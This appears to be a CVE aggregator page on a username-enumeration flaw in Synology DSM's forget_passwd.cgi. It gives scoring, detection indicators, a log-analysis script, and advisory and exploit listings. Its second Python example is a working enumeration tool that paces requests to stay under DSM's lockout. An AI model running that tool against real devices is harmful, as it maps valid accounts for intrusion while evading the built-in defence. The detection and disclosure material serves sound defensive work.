CVE-2017-9554
Published 2017-07-24
Priority: P1 · 82 · medium · 5.3 (CVSS 3.0)
CVSS 3.0 vector: AV:N / AC:L / PR:N / UI:N / S:U / C:L / I:N / A:N
Tags: ITW · EXPLOIT · VulnCheck KEV · Initial access
Exploited in the wild
EPSS: 75.02% (99.4th percentile)
An information exposure vulnerability in forget_passwd.cgi in Synology DiskStation Manager (DSM) before 6.1.3-15152 allows remote attackers to enumerate valid usernames via unspecified vectors.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| synology | diskstation_manager | <= 6.1.1-15101-4 | — |
Detection & IOCs (extracted from sources)
- Detect repeated GET requests to /webman/forget_passwd.cgi with varying `user=` parameter values; this is the enumeration vector for CVE-2017-9554.
- The NAS responds differently depending on whether the username exists, so differential analysis of forget_passwd.cgi responses (each probe compared against the response for a name that cannot exist) confirms enumeration attempts.
- These requests count as login attempts. Monitor for rapid sequential requests to forget_passwd.cgi; at the DSM default (10 attempts in 5 minutes) a burst trips a permanent block, but an attacker who knows this paces the requests, so do not rely on the lockout firing as your only signal.
- Known usernames probed during exploitation include admin, administrator, root, nobody and ftp; alert on forget_passwd.cgi requests naming these accounts from unknown sources.
- Affected versions span three DSM branches (6.1 before 6.1.3-15152, 6.0 before 6.0.3-8754-4, 5.2 before 5.2-5967-04, per the Metasploit module); ensure detection and patching cover all three.
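The detection points above, as an added example that is not part of this page or of any vendor or project: a small analyzer that parses web-server access log lines, keeps only requests to /webman/forget_passwd.cgi, and flags a source IP that probes several distinct `user=` values or that would reach the DSM default lockout threshold of 10 attempts in 5 minutes, also noting which of the well-known account names from the list above it touched. Assumptions not taken from the page: Apache/nginx combined log format (as a reverse proxy in front of the NAS would write it), the alert thresholds, the documentation-range IP addresses, and the five extra usernames (guest, backup, test, user, synology) that pad the constructed sample to ten probes.

```python
"""Flag username enumeration against DSM's forget_passwd.cgi in access logs.

Added example; not from the page, Synology, Metasploit or VulnCheck. The log
format, thresholds and sample traffic below are assumptions/constructed.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import parse_qs, urlsplit

# Combined log format: ip ident user [ts] "METHOD target proto" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
ENDPOINT = "/webman/forget_passwd.cgi"
WATCHED_ACCOUNTS = {"admin", "administrator", "root", "nobody", "ftp"}  # from the page
LOCKOUT_ATTEMPTS = 10                # DSM default cited by the Metasploit module
LOCKOUT_WINDOW = timedelta(minutes=5)


def parse_line(line):
    """Return {ip, ts, user, status} for a forget_passwd.cgi hit, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m["target"])
    if not parts.path.endswith(ENDPOINT):
        return None
    user = parse_qs(parts.query).get("user", [None])[0]
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return {"ip": m["ip"], "ts": ts, "user": user, "status": int(m["status"])}


def analyze(lines, distinct_threshold=3):
    """Group hits per source IP; report enumeration-shaped activity."""
    per_ip = defaultdict(list)
    for line in lines:
        ev = parse_line(line)
        if ev:
            per_ip[ev["ip"]].append(ev)

    findings = []
    for ip, events in per_ip.items():
        events.sort(key=lambda e: e["ts"])
        users = {e["user"] for e in events if e["user"]}
        # Largest number of hits inside any sliding 5-minute window.
        burst, j = 0, 0
        for i in range(len(events)):
            while events[i]["ts"] - events[j]["ts"] > LOCKOUT_WINDOW:
                j += 1
            burst = max(burst, i - j + 1)
        if len(users) >= distinct_threshold or burst >= LOCKOUT_ATTEMPTS:
            findings.append({
                "ip": ip,
                "requests": len(events),
                "distinct_users": sorted(users),
                "max_in_5min": burst,
                "watched_hits": sorted(users & WATCHED_ACCOUNTS),
                "would_trip_lockout": burst >= LOCKOUT_ATTEMPTS,
            })
    return findings


# --- Constructed sample traffic (not real logs) --------------------------------
def _line(ip, hhmmss, target):
    return (f'{ip} - - [12/Jan/2018:{hhmmss} +0000] "GET {target} HTTP/1.1" '
            f'200 31 "-" "curl/7.58.0"')


PROBED = ["admin", "administrator", "root", "nobody", "ftp",
          "guest", "backup", "test", "user", "synology"]   # last five: invented
SAMPLE_LOG = (
    # one scanner, ten names, two seconds apart: a burst that hits the default lockout
    [_line("203.0.113.7", f"09:00:{2 * i:02d}", f"{ENDPOINT}?user={u}")
     for i, u in enumerate(PROBED)]
    # one legitimate user resetting her own password, plus an unrelated request
    + [_line("198.51.100.4", "09:10:00", f"{ENDPOINT}?user=alice"),
       _line("198.51.100.4", "09:11:00", "/webman/index.cgi")]
)

if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG):
        print(f)
```

The distinct-username test is what catches a patient attacker who spaces probes out to stay under the lockout; the burst test reproduces the lockout counter so an analyst can tell whether DSM itself would already have blocked the source.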
CVSS provenance

| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| NVD | 3.0 | 5.3 | MEDIUM | CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N |
| NVD | 2.0 | 5.0 | MEDIUM | AV:N/AC:L/Au:N/C:P/I:N/A:N |
| VulnCheck | — | 5.3 | MEDIUM | — |
GHSA
GHSA-999r-3mg2-g4rj: An information exposure vulnerability in forget_passwd
GHSA unreviewed · 2022-05-14 · CVE-2017-9554 · MEDIUM · CWE-200
VulnCheck
synology diskstation_manager: Exposure of Sensitive Information to an Unauthorized Actor
VulnCheck · 2017 · CVE-2017-9554 · MEDIUM · CVSS 5.3
Affected: synology diskstation_manager
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable. In practice that means updating to DSM 6.1.3-15152 or later; the Metasploit module lists the fixed builds for the 6.0 and 5.2 branches.
Exploitation References: https://blog.apnic.net/2021/12/23/preparing-for-the-next-large-scale-iot-botnet-attack/
Exploit PoC: https://vulncheck.com/xdb/13f21c95757b; https://vulncheck.com/xdb/ca7998802530
No detection rules found.
Exploit-DB
Synology DiskStation Manager (DSM) < 6.1.3-15152 - 'forget_passwd.cgi' User Enumeration
Exploit-DB · 2018-01-08 · CVE-2017-9554 · MEDIUM · CVSS 5.3
---
# Exploit Title: Synology DiskStation Manager (DSM) < 6.1.3-15152 - 'forget_passwd.cgi' User Enumeration
# Date: 01/05/2018
# Exploit Author: Steve Kaun
# Vendor Homepage: https://www.synology.com
# Version: Before 6.1.3-15152
# CVE : CVE-2017-9554
Previously this was identified by the developer, and the disclosure states "via unspecified vectors"; it is possible to enumerate usernames via forget_passwd.cgi.
Haven't identified any other disclosures that actually identified the attack vector; figured it would be helpful to another.
"An information exposure vulnerability in forget_passwd.cgi in Synology DiskStation Manager (DSM) before 6.1.3-15152 allows remote attackers to enumerate valid usernames
Metasploit
Synology Forget Password User Enumeration Scanner
Metasploit module
This module attempts to enumerate users on the Synology NAS by sending GET requests for the forgot-password URL. The Synology NAS will respond differently if a user is present or not. These count as login attempts, and the default is 10 logins in 5 min to get a permanent block; set the delay accordingly to avoid this, as the default block is permanent.
Vulnerable DSM versions: DSM 6.1 < 6.1.3-15152; DSM 6.0 < 6.0.3-8754-4; DSM 5.2 < 5.2-5967-04
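The enumeration loop the module description above outlines, as an added example that is not the Metasploit module's code and not taken from this page: send GET requests to /webman/forget_passwd.cgi?user=<name>, record the response for a random username that cannot exist as the baseline, report every candidate whose response differs from it, and space the requests so the DSM default of 10 attempts in 5 minutes is never reached. The actual DSM response bodies are not shown on this page, so the classifier compares whole responses against the baseline instead of matching fixed strings; the transport at the bottom is a constructed stand-in with invented account names and bodies, and `fetch`, `safe_delay` and the slack value are this example's own names and choices.

```python
"""Baseline-differential username enumeration with lockout-aware pacing.

Added example; not the Metasploit module, not vendor code. Endpoint and the
10-in-5-minutes lockout default come from the page; everything else assumed.
"""
import secrets
import string
import time
from urllib.parse import parse_qs, urlencode, urlsplit

PATH = "/webman/forget_passwd.cgi"   # endpoint named in the detection notes
LOCKOUT_ATTEMPTS = 10                # DSM default per the module description
LOCKOUT_WINDOW_S = 5 * 60


def safe_delay(attempts=LOCKOUT_ATTEMPTS, window_s=LOCKOUT_WINDOW_S, slack_s=5.0):
    """Spacing that keeps every window_s-second window below `attempts` hits.

    With spacing d > window_s/(attempts-1), a closed window of window_s seconds
    holds at most floor(window_s/d)+1 <= attempts-1 requests.
    """
    return window_s / (attempts - 1) + slack_s


def random_username(length=12):
    """A name that will not exist on the target; its response is the baseline."""
    return "".join(secrets.choice(string.ascii_lowercase) for _ in range(length))


def enumerate_users(fetch, candidates, delay_s=None, sleep=time.sleep):
    """fetch(path_with_query) -> (status_code, body).

    Returns the baseline response, the candidates whose response differs from
    it, and how many requests went out (the lockout counter sees all of them,
    the baseline probe included).
    """
    if delay_s is None:
        delay_s = safe_delay()
    baseline = fetch(f"{PATH}?{urlencode({'user': random_username()})}")
    valid, sent = [], 1
    for name in candidates:
        sleep(delay_s)                      # stay under the lockout threshold
        resp = fetch(f"{PATH}?{urlencode({'user': name})}")
        sent += 1
        if resp != baseline:                # differential response => exists
            valid.append(name)
    return {"baseline": baseline, "valid": valid, "requests_sent": sent}


# --- Constructed stand-in for a NAS so the block runs offline ------------------
# Account names and bodies are invented placeholders. Replace fake_fetch with a
# real HTTPS client only against a host you are authorized to test.
FAKE_ACCOUNTS = {"admin", "alice"}


def fake_fetch(path_with_query):
    user = parse_qs(urlsplit(path_with_query).query).get("user", [""])[0]
    body = "body-for-existing-user" if user in FAKE_ACCOUNTS else "body-for-unknown-user"
    return 200, body


if __name__ == "__main__":
    # sleep=lambda s: None skips the pacing; only acceptable against the fake host.
    print(enumerate_users(fake_fetch, ["admin", "bob", "alice", "ftp"],
                          sleep=lambda s: None))
```

Comparing against a baseline rather than a hard-coded string keeps the check honest when a firmware update changes the wording but not the behaviour; the cost is one extra request, which the pacing accounts for by counting it toward the lockout budget.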
No writeups or analysis indexed.